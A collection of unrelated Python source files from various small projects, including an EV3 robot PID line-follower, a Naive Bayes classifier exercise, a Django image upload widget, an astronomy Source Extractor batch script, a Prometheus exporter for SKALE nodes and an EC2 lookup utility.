rm = ev3.LargeMotor('outC'); assert rm.connected # right motor
mm = ev3.MediumMotor('outD'); assert mm.connected # medium motor
speed = 360/4 # deg/sec, [-1000, 1000]
dt = 500 # milliseconds
stop_action = "coast"
# PID tuning
Kp = 1 # proportional gain
Ki = 0 # integral gain
Kd = 0 # derivative gain
integral = 0
previous_error = 0
# initial measurment
target_value = cs.value()
# Start the main loop
while not shut_down:
# deal with obstacles
# Calculate steering using PID algorithm
error = target_value - cs.value()
integral += (error * dt)
derivative = (error - previous_error) / dt
# u zero: on target, drive forward
# u positive: too bright, turn right
# u negative: too dark, turn left
u = (Kp * error) + (Ki * integral) + (Kd * derivative)
# limit u to safe values: [-1000, 1000] deg/sec
if speed + abs(u) > 1000:
if u >= 0:
u = 1000 - speed
else:
u = speed - 1000
# run motors
if u >= 0:
lm.run_timed(time_sp=dt, speed_sp=speed + u, stop_action=stop_action)
rm.run_timed(time_sp=dt, speed_sp=speed - u, stop_action=stop_action)
sleep(dt / 1000)
else:
lm.run_timed(time_sp=dt, speed_sp=speed - u, stop_action=stop_action)
rm.run_timed(time_sp=dt, speed_sp=speed + u, stop_action=stop_action)
sleep(dt / 1000)
previous_error = error
# Check if buttons pressed (for pause or stop)
if btn.down: # Stop
print("Exit program... ")
shut_down = True
elif not btn.left: # Pause
print("[Pause]")
pause()
# 'Pause' method
def pause(pct=0.0, adj=0.01):
while btn.right or btn.left: # ...wait 'right' button to unpause
ev3.Leds.set_color(ev3.Leds.LEFT, ev3.Leds.AMBER, pct)
ev3.Leds.set_color(ev3.Leds.RIGHT, ev3.Leds.AMBER, pct)
if (pct + adj) < 0.0 or (pct + adj) > 1.0:
adj = adj * -1.0
pct = pct + adj
print("[Continue]")
ev3.Leds.set_color(ev3.Leds.LEFT, ev3.Leds.GREEN)
ev3.Leds.set_color(ev3.Leds.RIGHT, ev3.Leds.GREEN)
# Main function
#if __name__ == "__main__":
run()
|
#!/usr/bin/python
"""
This is the code to accompany the Lesson 1 (Naive Bayes) mini-project.
Use a Naive Bayes Classifier to identify emails by their authors
authors and labels:
Sara has label 0
Chris has label 1
"""
import sys
from time import time
sys.path.append("../tools/")
from email_preprocess import preprocess
from sklearn.naive_bayes import GaussianNB
from sklearn.metrics import accuracy_score
from datetime import datetime
### features_train and features_test are the features for the training
### and testing datasets, respectively
### labels_train and labels_test are the corresponding item labels
features_train, features_test, labels_train, labels_test = preprocess()
#########################################################
### your code goes here ###
#########################################################
# we need to find out the elapsed time as well
start = datetime.now()
# create a Classifier
clf = GaussianNB()
# fit (ie train) the model
clf.fit(features_train, labels_train)
print "Model Trained !"
# predict using the trained model now
predicted = clf.predict(features_test)
print "Predicted !"
end = datetime.now()
print "Elapsed time = "+str(end-start)
print "Accuracy = "+str(accuracy_score(predicted, labels_test))
|
# from django.db.models.fields.files import FieldFile
from django.forms import widgets
from django.forms.widgets import ClearableFileInput, CheckboxInput, FILE_INPUT_CONTRADICTION
from django.utils.html import escape, conditional_escape
from django.utils.safestring import mark_safe
from sorl.thumbnail import get_thumbnail
from sorl.thumbnail.fields import ImageField, ImageFormField
from common.utils import image_from_url_get_2
#class ExTextInput(TextInput):
# def render(self, name, value, attrs=None):
# if value is None:
# value = ''
# final_attrs = self.build_attrs(attrs, type=self.input_type, name=name)
# if value != '':
# # Only add the 'value' attribute if a value is non-empty.
# final_attrs['value'] = force_unicode(self._format_value(value))
# return mark_safe(u'<input style="width:250" %s />' % flatatt(final_attrs))
class ExClearableFileInput(ClearableFileInput):
template_with_initial = u'''<span class="ex-image-form-field">
<span class="block-initial">%(initial)s %(clear_template)s</span>
<span class="block-inputs">%(input_text)s: %(input)s</span>
</span>'''
template_with_clear = u''' %(clear)s %(clear_checkbox_label)s'''
def image_url_name(self, name):
return '%s-image-url' % name
def render(self, name, value, attrs = None):
substitutions = {
'initial_text': self.initial_text,
'input_text': self.input_text,
'clear_template': '',
'clear_checkbox_label': self.clear_checkbox_label,
}
template = u'%(input)s or url: %(input_img_url)s'
substitutions['input'] = super(ClearableFileInput, self).render(name, value, attrs)
substitutions['input_img_url'] = widgets.TextInput(attrs = {'style' : 'width:320px'}).render(conditional_escape(self.image_url_name(name)), '')
if value and hasattr(value, "url"):
template = self.template_with_initial
# substitutions['initial'] = (u'<a href="%s">%s</a>'
# % (escape(value.url),
try:
from django.conf import settings
# img_url = get_thumbnail('%s/../%s' % (settings.PROJECT_ROOT, value.url), '140x140', crop = 'center top').url
img_url = get_thumbnail('%s/../%s' % (settings.PROJECT_ROOT, value.url), '140x140').url
substitutions['initial'] = (u'<a href="%s" class="image-href"><img class="image" src="%s" width="140"/></a>'
% (escape(value.url),
escape(img_url)))
except BaseException, e:
substitutions['initial'] = (u'<a href="%s" class="image-href"><img class="image" src="%s" width="140"/></a>'
% (escape(value.url),
escape(value.url)))
if not self.is_required:
checkbox_name = self.clear_checkbox_name(name)
checkbox_id = self.clear_checkbox_id(checkbox_name)
substitutions['clear_checkbox_name'] = conditional_escape(checkbox_name)
substitutions['clear_checkbox_id'] = conditional_escape(checkbox_id)
# substitutions['img_url_name'] = conditional_escape(checkbox_id)
substitutions['clear'] = CheckboxInput().render(checkbox_name, False, attrs={'id': checkbox_id})
substitutions['clear_template'] = self.template_with_clear % substitutions
return mark_safe(template % substitutions)
def value_from_datadict(self, data, files, name):
upload = super(ClearableFileInput, self).value_from_datadict(data, files, name)
# InMemoryUploadedFile
image_url = widgets.TextInput().value_from_datadict(data, files, self.image_url_name(name))
if not upload and image_url:
try:
upload = image_from_url_get_2(image_url)
except BaseException,e:
uplod = ''
if not self.is_required and CheckboxInput().value_from_datadict(
data, files, self.clear_checkbox_name(name)):
if upload:
# If the user contradicts themselves (uploads a new file AND
# checks the "clear" checkbox), we return a unique marker
# object that FileField will turn into a ValidationError.
return FILE_INPUT_CONTRADICTION
# False signals to clear any existing value, as opposed to just None
return False
return upload
class ExImageFormField(ImageFormField):
widget = ExClearableFileInput
#class ExFieldFile(FieldFile):
# def __unicode__(self):
# if hasattr(self, 'url'):
# try:
# from django.conf import settings
# img_url = get_thumbnail('%s/../%s' % (settings.PROJECT_ROOT, self.url), '140x140').url
# return mark_safe('<img url="%s"/>' % img_url)
# except BaseException, e:
# return self.url
# return ''
class ExImageField(ImageField):
def formfield(self, **kwargs):
defaults = {'form_class': ExImageFormField}
defaults.update(kwargs)
return super(ExImageField, self).formfield(**defaults)
class AdminExImageFieldMixin(object):
formfield_overrides = {
ExImageField: {'widget': ExClearableFileInput},
}
class Media:
css = {
'all': ['/static/css/ex_widgets.css']
}
|
#!/usr/bin/env python
from distutils.core import setup, Extension
from Cython.Build import cythonize
setup(
ext_modules=cythonize(
Extension(
"_smatch",
sources=["_smatch.pyx", "_gain.cc"],
language="c++",
extra_compile_args=["-std=c++11"]
)
)
)
|
login = {
'user': 'user',
'password': 'password'
}
directory = '/Users/usmankhan/Desktop'
resources = {
'url': 'https://lms.nust.edu.pk/portal/login/index.php',
'powerpoint': 'https://lms.nust.edu.pk/portal/theme/image.php/nust/core/1464680422/f/powerpoint-24',
'pdf': 'https://lms.nust.edu.pk/portal/theme/image.php/nust/core/1464680422/f/pdf-24',
'word': 'https://lms.nust.edu.pk/portal/theme/image.php/nust/core/1464680422/f/document-24'
}
|
import sys
class BaseObject(object):
"""BaseObject"""
def __init__(self):
self.strip_chars = ' \r\n\t/"\',\\'
@staticmethod
def convert_boole(target):
target = str(target).lower()
if target != 'true' and target != 'false':
error_message = 'Error: The expected input for {0} should be: True or False'.format(target)
sys.exit(error_message)
if target == 'true':
target = True
else:
target = False
return target
def validate_str(self, target, ignore_exception=False, target_name=None):
"""Function: validate_string
:param target: the target value
:param ignore_exception: the True or False
:param target_name: the target name
"""
if target is None or str(target).lower() == 'none':
return
get_type = type(target)
ignore_exception = self.convert_boole(ignore_exception)
try:
string_type = get_type is str or get_type is unicode
except NameError:
string_type = get_type is str
if not string_type and ignore_exception is False:
if target_name:
error_message = 'Error: The {0} - {1} is not string type. Please check.'.format(target_name, target)
else:
error_message = 'Error: The {0} is not string type. Please check.'.format(target)
sys.exit(error_message)
return string_type
def str_to_list(self, string, delimiter=',', lower=False):
"""Function: str_to_list
:param string: the string
:param delimiter: the delimiter for list (default comma)
:param lower: lower the string (default False)
:return
"""
if string is None or str(string).lower() == 'none':
return []
get_type = type(string)
error_message = 'Error: The string should be list or string, use comma to separate. ' \
'Current is: type-{0}, {1}'.format(get_type, string)
# Process if Value Error
try:
bool(string)
except ValueError:
sys.exit(error_message)
# Process the type
list_tuple_type = get_type is list or get_type is tuple
str_unicode_type = self.validate_str(string, True)
if list_tuple_type:
if lower:
li = [str(item).strip(self.strip_chars).lower() for item in string]
else:
li = [str(item).strip(self.strip_chars) for item in string]
elif str_unicode_type:
li = string.strip(self.strip_chars).split(delimiter)
if lower:
li = [item.strip(self.strip_chars).lower() for item in li]
else:
li = [item.strip(self.strip_chars) for item in li]
elif not string:
li = list()
else:
sys.exit(error_message)
return li
|
# postcodes generator
# TASK: takes 2 strings: '67-600' and '82-900' and returns a list of codes between
def main():
x = '67-600'
y = '82-900'
c = []
c.insert(0, x)
c.insert(len(c), y)
a = (len(c))
def add_new(z):
return c.insert((a-1), z)
# below examples
add_new('79-901')
print(c)
add_new('45-444')
print(c)
add_new('45-443')
print(c)
add_new('88-443')
print(c)
add_new('45-423')
print(c)
add_new('11-111')
print(c)
add_new('22-222')
print(c)
if __name__ == '__main__':
main()
|
import os
import numpy as np
from astropy.io import fits, ascii
from astropy.table import Column
import sdss_psf
from pyraf import iraf
import zeropoints
iraf.fuzzy()
iraf.gim2d()
hst_config = '/mnt/hd3/cosmos/hst_default.sex'
# CHANGE THIS TO HST IMAGE DIRECTORY
img_path = '/mnt/hd3/cosmos/ACS/'
psf_file = '/mnt/hd3/cosmos/cosmos_3dhst_v4.0_acs_psf/cosmos_3dhst.v4.0.F814W_psf.fits'
# CHANGE THIS STUFF FOR HST
imgfiles = [os.path.join(img_path,x) for x in sorted(os.listdir(img_path)) if x.startswith('acs_I_')&x.endswith('sci.fits')]
rmsfiles = [os.path.join(img_path,x.replace('sci','rms')) for x in imgfiles]
for i in range(len(imgfiles)):
print os.path.split(imgfiles[i])[-1]
# Run Source Extractor on image
catname = os.path.split(imgfiles[i])[-1].replace('.fits','.gfxt')
segname = os.path.split(imgfiles[i])[-1].replace('.fits','_seg.fits')
call = 'sextractor %s -c %s -CATALOG_NAME %s -CHECKIMAGE_NAME %s'
call += ' -WEIGHT_TYPE MAP_RMS -WEIGHT_IMAGE %s -MAG_ZEROPOINT %.2f'
call = call % (imgfiles[i], hst_config, catname, segname, rmsfiles[i], zeropoints.file_zp(imgfiles[i]))
print call
#creates acs_I_***_sci.gfxt (data) and acs_i_***_seg.fits (segmap)
os.system(call)
#open _sci.gfxt and add column with image number
sxt_out = ascii.read(catname)
imname = imgfiles[i][20:36]
newcol = Column(data = imname, name = 'IMAGE_ID')
sxt_out['IMAGE_ID'] = imname
ascii.write(sxt_out, catname, overwrite=True)
#Merge all files together
#Gain is good, zeropoint dones
#also change gain in default file or in call; this overwrites it
#then do te same for SDSS with changin gain and zeropint, runnint sextractor, putting into master image
|
#!/usr/bin/env python3
import time
import requests
import yaml
import sys
from prometheus_client import start_http_server, Summary, Enum
metrics = {}
def fetch(l):
for name, node in l.items():
try:
with metrics.get('skale_fetch_latency').labels(node=name).time():
req = requests.get(node + "/status/core")
res = req.json()
for container in res.get('data'):
metrics.get('skale_container_state').labels(container_name=container.get('name'), node=name, image=container.get('image')).state(container.get('state').get('Status'))
if res.get('error') is None:
metrics.get('skale_fetch_status').labels(node=name).state('OK')
else:
metrics.get('skale_fetch_status').labels(node=name).state('Error')
except requests.exceptions.Timeout:
metrics.get('skale_fetch_status').labels(node=name).state('Timeout')
except requests.exceptions.TooManyRedirects:
metrics.get('skale_fetch_status').labels(node=name).state('RedirectLoop')
except requests.exceptions.RequestException as e:
metrics.get('skale_fetch_status').labels(node=name).state('Exception')
except Exception as e:
metrics.get('skale_fetch_status').labels(node=name).state('Other')
if __name__ == '__main__':
with open(sys.argv[1]) as file:
config = yaml.load(file, Loader=yaml.FullLoader)
file.close()
# Start up the server to expose the metrics.
start_http_server(config.get('port', 8000))
metrics.update({'skale_container_state': Enum('skale_container_state', 'Container State',
['container_name', 'node', 'image'], states=['starting', 'running', 'stopped', 'error', 'restarting'])})
metrics.update({'skale_fetch_status': Enum('skale_fetch_status', 'Metrics fetch status', ['node'], states=['OK', 'Error', 'Timeout', 'RedirectLoop', 'Exception', 'Other'])})
metrics.update({'skale_fetch_latency': Summary('skale_fetch_latency', 'Time taken to fetch per node', ['node'])})
# Generate some requests.
while True:
fetch(config.get('nodes'))
time.sleep(config.get('interval', 15))
|
#!/usr/bin/env python
"""
Utiliy for looking up the network address of an Amazon ec2 instance
"""
from argparse import ArgumentParser
from awsutils import lookup
if __name__ == '__main__':
parser = ArgumentParser()
parser.add_argument('name',
help='Value of the Name tag of an ec2 instance',)
args = parser.parse_args()
print(lookup(name=args.name))
|
Subsets and Splits
No community queries yet
The top public SQL queries from the community will appear here once available.